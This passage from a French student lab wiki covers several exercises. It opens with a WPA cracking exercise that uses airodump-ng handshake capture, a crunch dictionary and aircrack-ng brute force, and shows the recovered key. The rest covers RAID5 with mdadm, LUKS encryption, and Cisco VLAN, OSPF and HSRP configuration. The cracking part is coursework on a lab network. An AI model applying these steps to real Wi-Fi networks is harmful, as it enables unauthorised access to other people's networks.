   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. &lt;br /&gt;
La manipulation des disques dur restera toujours une opération délicate demandant un maximum d'attention et ne devant pas se faire à la va-vite. Rien de mieux qu'un bon dimanche pluvieux pour s'aventurer dans ces contrées. Ne jamais oublier que les erreurs de manipulation sur les disques sont souvent irréversibles. Vous l'aurez compris, je vous dis tout ça afin de vous désigner comme seul responsable en cas de problèmes qui pourraient survenir sur votre matériel.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
